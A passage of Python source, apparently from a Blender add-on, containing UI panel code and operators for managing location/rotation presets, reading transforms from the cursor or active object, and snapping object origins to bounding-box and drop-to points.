sot.loc_rot_presets if pr_values != {} else 'Presets List Empty'\n\t\trow = col.row(align=True)\n\t\trow.enabled = True if pr_values != {} else False\n\t\trow.prop_enum(sot, 'spot_set_space', icon='EMPTY_AXIS', text=preset_mat, value= '5')\n\t\tif sot.spot_set_space == '5' and pr_values != {}:\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_rot_presets', text = '')\n\t\t\trow.prop(sot, 'draw_loc_rot_presets', text= '', icon= 'GRID')\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\tnp = row.operator(set_pick_operator, icon='TRIA_UP', text='')\n\t\tnp.prm_spt_mode, np.prm_not_active, np.prm_spt_axis, np.prm_spt_dir, np.prm_spt_space, np.prm_spt_spot = spt_prms(sot,'np')\n\t\tcp = row.operator(set_pick_operator, icon='KEYFRAME', text='')\n\t\tcp.prm_spt_mode, cp.prm_not_active, cp.prm_spt_axis, cp.prm_spt_dir, cp.prm_spt_space, 
cp.prm_spt_spot = spt_prms(sot,'cp')\n\t\tpp = row.operator(set_pick_operator, icon='KEYFRAME', text='')\n\t\tpp.prm_spt_mode, pp.prm_not_active, pp.prm_spt_axis, pp.prm_spt_dir, pp.prm_spt_space, pp.prm_spt_spot = spt_prms(sot,'pp')\n\t\tbom = row.operator(set_pick_operator, icon='KEYTYPE_BREAKDOWN_VEC', text='Border Mesh')\n\t\tbom.prm_spt_mode, bom.prm_not_active, bom.prm_spt_axis, bom.prm_spt_dir, bom.prm_spt_space, bom.prm_spt_spot = spt_prms(sot,'bom')\n\n\t\trow = col.row(align=True)\n\t\tnc = row.operator(set_pick_operator, icon='HANDLETYPE_VECTOR_VEC', text='')\n\t\tnc.prm_spt_mode, nc.prm_not_active, nc.prm_spt_axis, nc.prm_spt_dir, nc.prm_spt_space, nc.prm_spt_spot = spt_prms(sot,'nc')\n\t\tcc = row.operator(set_pick_operator, icon='KEYFRAME', text='')\n\t\tcc.prm_spt_mode, cc.prm_not_active, cc.prm_spt_axis, cc.prm_spt_dir, cc.prm_spt_space, cc.prm_spt_spot = spt_prms(sot,'cc')\n\t\tpc = row.operator(set_pick_operator, icon='KEYFRAME', text='')\n\t\tpc.prm_spt_mode, pc.prm_not_active, pc.prm_spt_axis, pc.prm_spt_dir, pc.prm_spt_space, pc.prm_spt_spot = spt_prms(sot,'pc')\n\t\tboc = row.operator(set_pick_operator, icon='KEYTYPE_EXTREME_VEC', text='Bound Center')\n\t\tboc.prm_spt_mode, boc.prm_not_active, boc.prm_spt_axis, boc.prm_spt_dir, boc.prm_spt_space, boc.prm_spt_spot = spt_prms(sot,'boc')\n\n\t\trow = col.row(align=True)\n\t\tnn = row.operator(set_pick_operator, icon='HANDLETYPE_VECTOR_VEC', text='')\n\t\tnn.prm_spt_mode, nn.prm_not_active, nn.prm_spt_axis, nn.prm_spt_dir, nn.prm_spt_space, nn.prm_spt_spot = spt_prms(sot,'nn')\n\t\tcn = row.operator(set_pick_operator, icon='HANDLETYPE_VECTOR_VEC', text='')\n\t\tcn.prm_spt_mode, cn.prm_not_active, cn.prm_spt_axis, cn.prm_spt_dir, cn.prm_spt_space, cn.prm_spt_spot = spt_prms(sot,'cn')\n\t\tpn = row.operator(set_pick_operator, icon='HANDLETYPE_VECTOR_VEC', text='')\n\t\tpn.prm_spt_mode, pn.prm_not_active, pn.prm_spt_axis, pn.prm_spt_dir, pn.prm_spt_space, pn.prm_spt_spot = spt_prms(sot,'pn')\n\t\tcom = row.operator(set_pick_operator, icon='KEYTYPE_KEYFRAME_VEC', text='Center Of Mass')\n\t\tcom.prm_spt_mode, com.prm_not_active, com.prm_spt_axis, com.prm_spt_dir, com.prm_spt_space, com.prm_spt_spot = spt_prms(sot,'com')\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\tdtp = row.operator(set_pick_operator, icon='TRIA_DOWN_BAR', text='Drop To')\n\t\tdtp.prm_spt_mode, dtp.prm_not_active, dtp.prm_spt_axis, dtp.prm_spt_dir, dtp.prm_spt_space, dtp.prm_spt_spot, dtp.prm_drp_m, dtp.prm_drp_sm, \\\n\t\t\tdtp.prm_drp_off, dtp.prm_drp_czpb, dtp.prm_drp_czpv = spt_prms(sot,'dtp_b',True)\n\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'drop_to_mode', icon='SNAP_PERPENDICULAR', value= '1')\n\t\trow.prop_enum(sot, 'drop_to_mode', icon='SNAP_FACE_CENTER', value= '2')\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'drop_to_smode', icon='EMPTY_AXIS' if sot.drop_to_mode == '1' else 'MOD_EDGESPLIT', value= '1', text= 'Zero' if sot.drop_to_mode == '1' else 'Side')\n\t\trow.prop_enum(sot, 'drop_to_smode', icon='NLA_PUSHDOWN' if sot.drop_to_mode == '1' else 'ALIGN_MIDDLE', value= '2')\n\n\t\trow = col.row(align=True)\n\t\trow.prop(sot, 'drop_to_offset', text= 'Offset')\n\t\trow.operator(clear, icon='X' if sot.drop_to_offset != 0 else 'DOT', text='')\t\t\t\t.cop = 'drop_to_offset'\n\t\tif sot.drop_to_mode == '1' and sot.drop_to_smode == '1':\n\t\t\tcol.prop(sot, 'drop_custom_zero', text= 'Custom Zero Point', toggle= True)\n\t\t\tif sot.drop_custom_zero:\n\t\t\t\trow = col.row(align=True)\n\t\t\t\trow.prop(sot, 
'czp_x', text= 'X') \t\n\t\t\t\trow.operator(clear, icon='X' if sot.czp_x != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'czp_x'\n\t\t\t\trow = col.row(align=True)\n\t\t\t\trow.prop(sot, 'czp_y', text= 'Y')\n\t\t\t\trow.operator(clear, icon='X' if sot.czp_y != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'czp_y'\n\t\t\t\trow = col.row(align=True)\t\t\t\n\t\t\t\trow.prop(sot, 'czp_z', text= 'Z')\n\t\t\t\trow.operator(clear, icon='X' if sot.czp_z != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'czp_z'\n\t\t\t\trow = col.row(align=True)\n\t\t\t\temb = True if pr_values != {} else False\n\t\t\t\trow.operator(get, icon='EMPTY_AXIS', text='Preset', emboss= emb)\t\t\t\t\t.prm_get_transform = 'czp_p'\n\t\t\t\trow.operator(get, icon='PIVOT_CURSOR', text='Cursor')\t\t\t\t\t\t\t\t.prm_get_transform = 'czp_c'\n\t\t\t\trow.operator(get, icon='PIVOT_ACTIVE', text='Active')\t\t\t\t\t\t\t\t.prm_get_transform = 'czp_a'\n\t\t\t\tnot_zero = True if sot.czp_x != 0 or sot.czp_y != 0 or sot.czp_z != 0 else False\n\t\t\t\trow.operator(clear, icon='X' if not_zero else 'DOT', text='')\t\t\t\t\t\t.cop = 'multi czp_x czp_y czp_z'\n\n\t\tcol.separator(factor=1)\n\t\trow = col.row(align=True)\n\t\trow.prop(sot, 'draw_spots', text= 'Hide Visuals' if sot.draw_spots else 'Show Visuals', \n\t\t\ticon='RADIOBUT_OFF' if not sot.draw_spots else 'RADIOBUT_ON', toggle= True)\n\t\tif sot.draw_spots:\n\t\t\trow.prop(sot, 'draw_spots_recalc', text= 'Refresh', icon='FILE_REFRESH', toggle= True)\n\t\tif sot.draw_spots:\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'draw_spots_scale', text= 'Spots Scale')\n\t\t\trow.operator(clear, icon='X' if sot.draw_spots_scale != 1 else 'DOT', text='')\t\t\t.cop = 'draw_spots_scale'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'draw_opt_bndc', icon='CUBE', text= 'Cage')\n\t\t\trow.prop(sot, 'draw_opt_bnds', icon='GROUP_VERTEX', text= 'Spots')\n\t\t\trow.prop(sot, 'draw_opt_dtpl', icon='TRACKING_BACKWARDS_SINGLE', text= 'Drop')\n\n\n\n\n\n\n# OPERATORS------------------------------------------------------------------------------------------------------\n\n\n\n\n\n\nclass SOT_OT_Preset_Ren(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_ren'\n\tbl_label = 'Rename'\n\tbl_description = 'Rename selected item (if name is not unique - numbering will be assigned)'\n\n\tprm_new_name: bpr.StringProperty(name = '', default= 'New Name')\n\n\tdef execute(self, context):\n\t\tsot = context.scene.sot_props\n\t\tnew_name = self.prm_new_name\n\t\tnew_values = {}\n\t\tglobal pr_values\n\n\t\tif new_name == '': return report(self,'Please enter at least something')\n\n\t\tfor k,v in pr_values.items():\n\t\t\tif k != sot.loc_rot_presets: \n\t\t\t\tnew_values[k] = v\n\t\t\telse: \n\t\t\t\tnew_name = unic_name_geterator(new_name,pr_values.keys(),True,sot.loc_rot_presets)\n\t\t\t\tnew_values[new_name] = v\n\t\tpr_values = new_values\n\n\t\treturn{'FINISHED'}\n\n\tdef invoke(self, context, event):\n\t\tif pr_values != {}: \n\t\t\tself.prm_new_name = context.scene.sot_props.loc_rot_presets\n\t\t\treturn context.window_manager.invoke_props_dialog(self, width=150)\n\t\telse: return report(self,'Presets list is EMPTY!!!')\t\n\n\nclass SOT_OT_Preset_Add(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_add'\n\tbl_label = 'New Preset'\n\tbl_description = 'Save current loc/rot values as preset'\n\n\tprm_name: bpr.StringProperty(name = '', default= 'Preset')\n\n\tdef execute(self, context):\n\t\tsot = context.scene.sot_props\n\t\tname = self.prm_name\n\n\t\tif name == '': return report(self,'Please enter at least 
something')\t\n\n\t\tname = unic_name_geterator(name,pr_values.keys())\n\t\tlx,ly,lz,rx,ry,rz = sot.loc_x,sot.loc_y,sot.loc_z, sot.rot_x, sot.rot_y, sot.rot_z\n\t\tpr_values[name] = ((round(lx,5),round(ly,5),round(lz,5)),(rx,ry,rz))\n\t\tsot.loc_rot_presets = (list(pr_values.keys())[len(pr_values) - 1])\n\n\t\treturn{'FINISHED'}\n\n\tdef invoke(self, context, event):\n\t\treturn context.window_manager.invoke_props_dialog(self, width=150)\n\nclass SOT_OT_Preset_Add_Cursor(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_add_cursor'\n\tbl_label = 'New Preset From Cursor'\n\tbl_description = 'Create preset from current 3D Cursor location/rotation'\n\n\tdef execute(self, context):\n\t\tbpy.ops.fgt.sot_get_transform(prm_get_transform= 'loc_c')\n\t\tbpy.ops.fgt.sot_get_transform(prm_get_transform= 'rot_c')\n\t\tbpy.ops.fgt.sot_preset_add('INVOKE_DEFAULT')\n\n\t\treturn{'FINISHED'}\n\n\nclass SOT_OT_Preset_Add_Active(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_add_active'\n\tbl_label = 'New Preset From Active'\n\tbl_description = 'Create preset from current Active object/element location/rotation'\n\n\tdef execute(self, context):\n\t\tsot = context.scene.sot_props\n\n\t\tbpy.ops.fgt.sot_preset_add('INVOKE_DEFAULT')\n\n\t\treturn{'FINISHED'}\n\nclass SOT_OT_Preset_Rem(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_rem'\n\tbl_label = 'Remove'\n\tbl_description = 'Remove current item from presets list'\n\n\tdef execute(self, context):\n\t\tsot = context.scene.sot_props\n\n\t\tif len(pr_values) != 0:\n\t\t\tif list(pr_values.keys()).index(sot.loc_rot_presets) == len(pr_values) - 1:\n\t\t\t\tdel pr_values[sot.loc_rot_presets]\n\t\t\t\tif len(pr_values) != 0:\n\t\t\t\t\tsot.loc_rot_presets = (list(pr_values.keys())[len(pr_values) - 1])\n\t\t\telse:\n\t\t\t\tdel pr_values[sot.loc_rot_presets]\n\n\t\t\tif pr_values == {} and sot.spot_set_space == '5': sot.spot_set_space = '1'\n\n\t\telse: return report(self,'No more items to remove')\n\t\treturn{'FINISHED'}\n\n\tdef invoke(self, context, event):\n\t\treturn context.window_manager.invoke_props_dialog(self, width=150)\t\n\n\nclass SOT_OT_Preset_Rrd(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_rrd'\n\tbl_label = 'Reorder'\n\tbl_description = 'Move current item up/down in presets list (if possible)'\n\n\treorder_up: bpr.BoolProperty()\n\n\tdef execute(self, context):\n\t\tglobal pr_values\n\t\tif pr_values == {}: return report(self,\"Presets list is EMPTY!!!\")\n\t\tsot = context.scene.sot_props\n\t\tind = list(pr_values.keys()).index(sot.loc_rot_presets)\n\t\tnew_pr,ksi,ks = {},[],[]\n\n\t\tif self.reorder_up :\n\t\t\tif ind != 0:\n\t\t\t\tksi = [e for e,i in enumerate(pr_values.keys())]\n\t\t\t\tksi[ind] = ksi[ind]-1\n\t\t\t\tksi[ind-1] = ksi[ind]+1\n\t\t\t\tks = [list(pr_values.keys())[i] for i in ksi]\n\t\t\t\tfor k in ks: new_pr[k] = pr_values.get(k)\n\t\t\t\tpr_values = new_pr\n\t\t\t\tsot.loc_rot_presets = ks[ind-1]\n\t\t\telse: return report(self,\"Can't move this item UP!!!\")\n\t\telse:\n\t\t\tif ind != len(pr_values) - 1:\n\t\t\t\tksi = [e for e,i in enumerate(pr_values.keys())]\n\t\t\t\tksi[ind] = ksi[ind]+1\n\t\t\t\tksi[ind+1] = ksi[ind]-1\n\t\t\t\tks = [list(pr_values.keys())[i] for i in ksi]\n\t\t\t\tfor k in ks: new_pr[k] = pr_values.get(k)\n\t\t\t\tpr_values = new_pr\n\t\t\t\tsot.loc_rot_presets = ks[ind+1]\n\t\t\telse: return report(self,\"Can't move this item DOWN!!!\")\n\t\treturn{'FINISHED'}\n\n\nclass SOT_OT_Preset_Get(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_get'\n\tbl_label = 'Get 
Values'\n\tbl_description = 'Get values from preset'\n\n\tprm_preset_get: bpr.EnumProperty(items= [('loc','Get Location','',1),('rot','Get Rotation','',2),('both','Get Location And Rotation','',3)])\n\n\n\tdef execute(self, context):\n\t\tsot = context.scene.sot_props\n\n\t\tif pr_values == {}:\n\t\t\treturn report(self,\"Presets list is EMPTY!!!\")\n\t\telse:\n\t\t\tif self.prm_preset_get == 'loc': sot.loc_x,sot.loc_y,sot.loc_z = pr_values.get(sot.loc_rot_presets)[0] \n\t\t\telif self.prm_preset_get == 'rot': sot.rot_x, sot.rot_y, sot.rot_z = pr_values.get(sot.loc_rot_presets)[1]\n\t\t\telse:\n\t\t\t\tsot.loc_x,sot.loc_y,sot.loc_z = pr_values.get(sot.loc_rot_presets)[0] \n\t\t\t\tsot.rot_x, sot.rot_y, sot.rot_z = pr_values.get(sot.loc_rot_presets)[1]\t\n\t\treturn{'FINISHED'}\n\n\nclass SOT_OT_Set_Loc_Rot(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_set_origin_loc_rot'\n\tbl_label = 'Set Origin Transforms'\n\tbl_description = 'Set origin location/orientation'\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\tprm_set_loc_rot:\tbpr.EnumProperty(name= 'Set Origin', items= [('Loc','Location','',1),('Rot','Rotation','',2),('Loc + Rot','Location + Rotation','',3)])\n\tprm_set_act_bat: \tbpr.EnumProperty(name= 'Set Mode', items= [('1','Active','',1),('2','Batch','',2)])\n\tprm_set_location:\tbpr.FloatVectorProperty(name= 'Location', subtype= 'XYZ_LENGTH', unit= 'LENGTH', precision= 6)\n\tprm_set_rotation:\tbpr.FloatVectorProperty(name= 'Rotation', subtype= 'EULER', soft_min= -360.0, soft_max= 360.0)\n\n\tdef execute(self,context):\n\t\tbob = bpy.ops.object\n\t\tsot = context.scene.sot_props\n\t\tbco = bpy.context\n\t\tbcv = bco.view_layer\n\t\taob = bcv.objects.active\n\t\tsob = bco.selected_objects\n\t\toob = sob\n\t\taob_r = aob\n\t\tsob_r = sob\n\t\tloc_rot = self.prm_set_loc_rot\n\n\t\txl,yl,zl = self.prm_set_location\n\t\txr,yr,zr = self.prm_set_rotation[:]\n\n\t\teob = object_in_edit(bob,sob_r)\n\n\t\tif self.prm_set_act_bat == '1':\n\t\t\tif aob == None: return report(self,'No ACTIVE object in selection!!!!')\n\t\t\tif loc_rot == 'Loc' or loc_rot == 'Loc + Rot': set_origin_location(xl,yl,zl,aob,bcv)\n\t\t\tif loc_rot == 'Rot' or loc_rot == 'Loc + Rot': set_origin_orientation(xr,yr,zr,aob,bcv,bob)\n\t\telse:\n\t\t\tif sob_r == []: return report(self,'No SELECTED objects!!!!')\n\t\t\tfor tob in sob_r:\n\t\t\t\tif loc_rot == 'Loc' or loc_rot == 'Loc + Rot': set_origin_location(xl,yl,zl,tob,bcv,oob)\n\t\t\t\tif loc_rot == 'Rot' or loc_rot == 'Loc + Rot': set_origin_orientation(xr,yr,zr,tob,bcv,bob)\n\n\t\trecover_edit(eob,bcv,aob_r,sob_r)\n\n\t\treturn {'FINISHED'}\n\n\nclass SOT_OT_Get_Transform(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_get_transform'\n\tbl_label = 'SOT_OT_Get_Transform'\n\tbl_description = 'Get transform values from...'\n\n\tprm_get_transform:\tbpr.EnumProperty(name= 'Get Transform', items= [\n\t\t('loc_c','Cursor','',1),('loc_a','Active','',2),\n\t\t('rot_c','Cursor','',3),('rot_a','Active','',4),\n\t\t('lr_c','Cursor','',5),('lr_a','Active','',6),\n\t\t('czp_p','Preset','',7),('czp_c','Cursor','',8),('czp_a','Active','',9)])\n\n\tdef execute(self,context):\n\t\tsot = context.scene.sot_props\n\t\tgtr = self.prm_get_transform\n\t\tbco = bpy.context\n\t\tbcv = bco.view_layer\n\t\taob = bcv.objects.active\n\n\t\tif gtr == 'loc_c':\t\t#Get location from Cursor\n\t\t\tset_manual_values(sot,get_cursor_loc_rot(bco,sot,True),'loc')\n\n\t\telif gtr == 'loc_a':\t\t#Get location from Active Object/Element\n\t\t\tif bco.mode == 'OBJECT':\n\t\t\t\tvalue = 
get_object_loc_rot(self,bco,sot,True)\n\t\t\t\tif type(value) is not set: set_manual_values(sot,value,'loc')\n\t\t\telif bco.mode == 'EDIT_MESH':\n\t\t\t\tvalue = get_element_loc(self,bco,sot,aob)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value,'loc')\n\n\t\telif gtr == 'rot_c':\t\t#Get rotation from Cursor\n\t\t\tset_manual_values(sot, get_cursor_loc_rot(bco,sot,False).to_euler(),'rot')\n\n\t\telif gtr == 'rot_a':\t\t#Get rotation from Active Object/Element\n\t\t\tif bco.mode == 'OBJECT':\n\t\t\t\tvalue = get_object_loc_rot(self,bco,sot,False)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value.to_euler(),'rot')\n\t\t\telif bco.mode == 'EDIT_MESH':\n\t\t\t\tvalue = get_element_vectors(self,bco,sot,aob)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value.to_euler(),'rot')\n\n\t\telif gtr == 'lr_c':\t\t\t# Get Loc/Rot from Cursor\n\t\t\tset_manual_values(sot,get_cursor_loc_rot(bco,sot,True),'loc')\n\t\t\tset_manual_values(sot, get_cursor_loc_rot(bco,sot,False).to_euler(),'rot')\n\n\t\telif gtr == 'lr_a':\t\t\t# Get Loc/Rot from Active\n\t\t\tif bco.mode == 'OBJECT':\n\t\t\t\tvalue = get_object_loc_rot(self,bco,sot,True)\n\t\t\t\tif type(value) is not set: set_manual_values(sot,value,'loc')\n\t\t\t\tvalue = get_object_loc_rot(self,bco,sot,False)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value.to_euler(),'rot')\n\n\t\t\telif bco.mode == 'EDIT_MESH':\n\t\t\t\tvalue = get_element_loc(self,bco,sot,aob)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value,'loc')\n\t\t\t\tvalue = get_element_vectors(self,bco,sot,aob)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value.to_euler(),'rot')\n\n\t\telif gtr == 'czp_p':\t\t#Get location from Preset\n\t\t\tset_manual_values(sot,get_preset_loc_rot(sot,True),'czp')\n\n\t\telif gtr == 'czp_c':\t\t#Get location from Cursor\n\t\t\tset_manual_values(sot,get_cursor_loc_rot(bco,sot,True),'czp')\n\n\t\telif gtr == 'czp_a':\t\t#Get location from Active Object/Element\n\t\t\tif bco.mode == 'OBJECT':\n\t\t\t\tvalue = get_object_loc_rot(self,bco,sot,True)\n\t\t\t\tif type(value) is not set: set_manual_values(sot,value,'czp')\n\t\t\telif bco.mode == 'EDIT_MESH':\n\t\t\t\tvalue = get_element_loc(self,bco,sot,aob)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value,'czp')\n\n\t\treturn {'FINISHED'}\n\nclass SOT_OT_Rotate_Ninety(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_rotate_ninety'\n\tbl_label = 'SOT_OT_Rotate_Ninety'\n\tbl_description = 'Rotate orientation around this axis by 90 degrees'\n\n\trop: bpr.StringProperty(name = '', default = '')\n\n\tdef execute(self,context):\n\t\tsot = context.scene.sot_props\n\n\t\teuler = mu.Euler((sot.rot_x,sot.rot_y,sot.rot_z),'XYZ')\n\t\trmt = euler.to_matrix()\n\t\trop_dic = {'x':rmt.col[0],'y':rmt.col[1],'z':rmt.col[2],'-':-90, '+':90}\n\t\trmt.rotate(mu.Quaternion(rop_dic.get(self.rop[-1]), math.radians(rop_dic.get(self.rop[0]))))\n\t\tsot.rot_x,sot.rot_y,sot.rot_z = rmt.to_euler()\n\n\t\tif abs(math.degrees(sot.rot_x)) < 0.0001: sot.rot_x = 0\n\t\tif abs(math.degrees(sot.rot_y)) < 0.0001: sot.rot_y = 0\n\t\tif abs(math.degrees(sot.rot_z)) < 0.0001: sot.rot_z = 0\n\n\t\treturn {'FINISHED'}\n\n\nclass SOT_OT_Fixed_Snap(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_fixed_snap'\n\tbl_label = 'Origin Fixed Spot Snap'\n\tbl_description = 'Snap origin position to fixed bounding box/scene point'\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\tprm_spt_mode: bpr.EnumProperty(name= 'Fixed Spot Mode', items= 
[('1','Active','',1),('2','Multi','',2),('3','To Active','',3),('4','For Each','',4)])\n\tprm_not_active: bpr.BoolProperty(name= 'Exclude Active', default= False, description= 'Only for To Active and For Each modes, leave Active object unchanged')\n\tprm_spt_axis: bpr.EnumProperty(name= 'Projection Along', items= [('1','X Axis','',1),('2','Y Axis','',2),('3','Z Axis','',3)])\n\tprm_spt_dir: bpr.EnumProperty(name= 'Projection Direction', items= [('1','Positive','',1),('2','Negative','',2)])\n\tprm_spt_space: bpr.EnumProperty(name = 'Projection Space', items= [('1','Global','',1),('2','Local','',2),('3','View','',3),('4','Cursor','',4),('5','Preset','',5)])\n\tprm_spt_spot: bpr.EnumProperty(name='Choose Spot',\n\t\titems= [\n\t\t('np','Projection A Neg - B Pos','',1),\n\t\t('cp','Projection A Cen - B Pos','',2),\n\t\t('pp','Projection A Pos - B Pos','',3),\n\t\t('nc','Projection A Neg - B Cen','',4),\n\t\t('cc','Projection A Cen - B Cen','',5),\n\t\t('pc','Projection A Pos - B Cen','',6),\n\t\t('nn','Projection A Neg - B Neg','',7),\n\t\t('cn','Projection A Cen - B Neg','',8),\n\t\t('pn','Projection A Pos - B Neg','',9),\n\t\t('bom','Border Mesh Spot','',10),\n\t\t('boc','Bound Center Spot','',11),\n\t\t('com','Center Of Mass Spot','',12),\n\t\t('dtp_b','Drop To Spot','',13)])\n\tprm_drp_m: bpr.EnumProperty(name= 'Drop To Mode', items= [('1','Space','',1),('2','Bound','',2)])\n\tprm_drp_sm: bpr.EnumProperty(name= 'Drop To Submode', items= [('1','Zero','',1),('2','Median','',2)])\n\tprm_drp_off: bpr.FloatProperty(name= 'Drop To Offset', subtype = 'DISTANCE', precision= 6)\n\tprm_drp_czpb: bpr.BoolProperty(name= 'Use Custom Zero', default= False, description= 'Only for Drop To Mode = Space + Drop To Submode = Zero')\n\tprm_drp_czpv: bpr.FloatVectorProperty( name= 'Custom Zero', subtype= 'XYZ_LENGTH', unit= 'LENGTH', precision= 6)\n\n\tdef execute(self,context):\n\t\tbob = bpy.ops.object\n\t\tbco = bpy.context\n\t\tbcv = bco.view_layer\n\t\tsot = context.scene.sot_props\n\t\taob = bco.active_object\n\t\tsob = bco.selected_objects\n\n\n\t\tif 'MESH' not in [ob.type for ob in sob]: return report(self,'No MESH objects in selection!!!')\n\t\tif self.prm_spt_mode == '1' or self.prm_spt_mode == '3':\n\t\t\tif aob_check(aob)[0]: return report(self, aob_check(aob)[1])\t\t\n\t\t\telif aob.type != 'MESH': return report(self,'ACTIVE object is not MESH type!!!')\n\n\t\tmob = [ob for ob in sob if ob.type == 'MESH']\n\t\taob_r = aob\n\t\tsob_r = sob\n\n\n\t\tglobal spot_sob_matrices_vdata\n\t\tglobal spot_orient_matrix\n\t\tglobal spot_psp_data\n\n\t\tif pr_values == {} and sot.spot_set_space == '5': \n\t\t\tsot.spot_set_space = '1'\n\t\t\tself.prm_spt_space = '1'\n\n\t\tmatrices_vdata_get(self.prm_spt_mode,aob,sob)\n\t\trotation_matrix_get(self.prm_spt_space,bco,sot,aob,sob)\n\t\tspots_calc(self.prm_spt_mode,self.prm_spt_space)\n\t\tprojection_calc(self.prm_spt_axis,self.prm_spt_dir,self.prm_drp_m,self.prm_drp_sm, \\\n\t\t\t\t\t\tself.prm_drp_off,self.prm_drp_czpb,self.prm_drp_czpv)\n\n\t\txl,yl,zl = spot_psp_data[0].get(self.prm_spt_spot)\n\n\t\teob = object_in_edit(bob,sob_r)\n\n\t\tif self.prm_spt_mode == '1':\n\t\t\tset_origin_location(xl,yl,zl,aob,bcv)\n\t\telif self.prm_spt_mode == '2':\n\t\t\tfor tob in mob:\n\t\t\t\tset_origin_location(xl,yl,zl,tob,bcv)\n\t\telif self.prm_spt_mode == '3':\n\t\t\tfor tob in sob_r:\n\t\t\t\tif self.prm_not_active and tob == aob: continue\n\t\t\t\tset_origin_location(xl,yl,zl,tob,bcv)\n
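\t\t# 'For Each' mode: every mesh object gets its own spot set, so the location\n\t\t# is re-read from spot_psp_data by object index instead of entry 0.\n\t\telse:\n\t\t\tfor index,tob in enumerate(mob):\n\t\t\t\tif self.prm_not_active 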
and tob == aob: continue\n\t\t\t\txl,yl,zl = spot_psp_data[index].get(self.prm_spt_spot)\n\t\t\t\tset_origin_location(xl,yl,zl,tob,bcv)\n\n\t\trecover_edit(eob,bcv,aob_r,sob_r)\n\n\n\t\t# bob = bpy.ops.object\n\t\t# spot = self.prm_set_spot_d\n\t\t# rep = self.report\n\t\t# sot = context.scene.sot_props\n\t\t# bco = bpy.context\n\t\t# bcv = bco.view_layer\n\t\t# aob = bcv.objects.active\n\t\t# sob = bco.selected_objects\n\t\t# aob_r = aob\n\t\t# sob_r = sob\n\n\t\t# if sot.spot_set_pick == '2':\n\t\t# \tif aob_check(aob)[0]: return report(self, aob_check(aob)[1])\n\n\t\t# \tpsp = get_snap_spot_active(bco,sot,aob)\n\t\t# \tsot.loc_x,sot.loc_y,sot.loc_z = psp.get(spot)\n\t\t# \tbpy.ops.ed.undo_push(message = 'Pick Spot Location' )\n\n\t\t# else:\n\t\t# \tif sot.spot_set_mode == '1' or sot.REPLACE_ME_PLEASE == '1':\n\n\t\t# \t\tif aob_check(aob)[0]: return report(self, aob_check(aob)[1])\n\t\t# \t\tif mesh_check(aob)[0]: return report(self, mesh_check(aob)[1])\n\n\t\t# \t\tpsp = get_snap_spot_active(bco,sot,aob)\n\t\t# \t\tx,y,z = psp.get(spot)\n\n\n\t\t# \t\t'''\n\t\t# \t\tNOTE\n\t\t# \t\tundo push - let it sit here for now\n\t\t# \t\t'''\n\n\t\t# \t\teob = object_in_edit(bob,sob_r)\n\t\t# \t\tif sot.spot_set_mode == '1':\n\t\t# \t\t\tset_origin_location(x,y,z,aob,bcv)\n\t\t# \t\t\t#bpy.ops.ed.undo_push(message = 'SOT Fixed Snap A')\n\t\t# \t\telif sot.spot_set_mode == '2':\n\t\t# \t\t\tfor tob in sob:\n\t\t# \t\t\t\tif sot.spot_set_not_active:\n\t\t# \t\t\t\t\tif tob == aob_r:\n\t\t# \t\t\t\t\t\tcontinue\n\t\t# \t\t\t\tset_origin_location(x,y,z,tob,bcv)\n\t\t# \t\t\t#bpy.ops.ed.undo_push(message = 'SOT Fixed Snap BTA')\n\t\t# \t\trecover_edit(eob,bcv,aob_r,sob_r)\n\n\t\t# \tif sot.spot_set_mode == '2':\n\n\t\t# \t\tif aob_check(aob)[0]: return report(self, aob_check(aob)[1])\n\t\t# \t\tfor tob in sob:\n\t\t# \t\t\tif mesh_check(tob)[0]:return report(self, mesh_check(tob)[1])\n\n\t\t# \t\teob = object_in_edit(bob,sob_r)\n\t\t# \t\tbpy.ops.ed.undo_push(message = 'SOT Fixed Snap M' )\n\t\t# \t\trecover_edit(eob,bcv,aob_r,sob_r)\n\n\t\t# \tif sot.spot_set_mode == '3' and sot.REPLACE_ME_PLEASE == '2':\n\n\t\t# \t\tfor tob in sob:\n\t\t# \t\t\tif mesh_check(tob)[0]:return report(self, mesh_check(tob)[1])\n\n\t\t# \t\teob = object_in_edit(bob,sob_r)\n\t\t# \t\tfor tob in sob:\n\t\t# \t\t\tvdt = tob.data.vertices\n\t\t# \t\t\tobm = tob.matrix_world\n\t\t# \t\t\tsps = spots(sot,obm,vdt)\n\t\t# \t\t\tpsp = projection(sot,obm,sps)[0]\n\t\t# \t\t\tpsp['dtp'] = projection(sot,obm,sps)[2][1]\n\t\t# \t\t\tx,y,z = psp.get(spot)\n\t\t# \t\t\tset_origin_location(x,y,z,tob,bcv)\n\t\t# \t\tbpy.ops.ed.undo_push(message = 'SOT Fixed Snap BPO' )\n\t\t# \t\trecover_edit(eob,bcv,aob_r,sob_r)\n\n\t\treturn{'FINISHED'}\n\n\nclass SOT_OT_Fixed_Spot_Pick(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_fixed_spot_pick'\n\tbl_label = 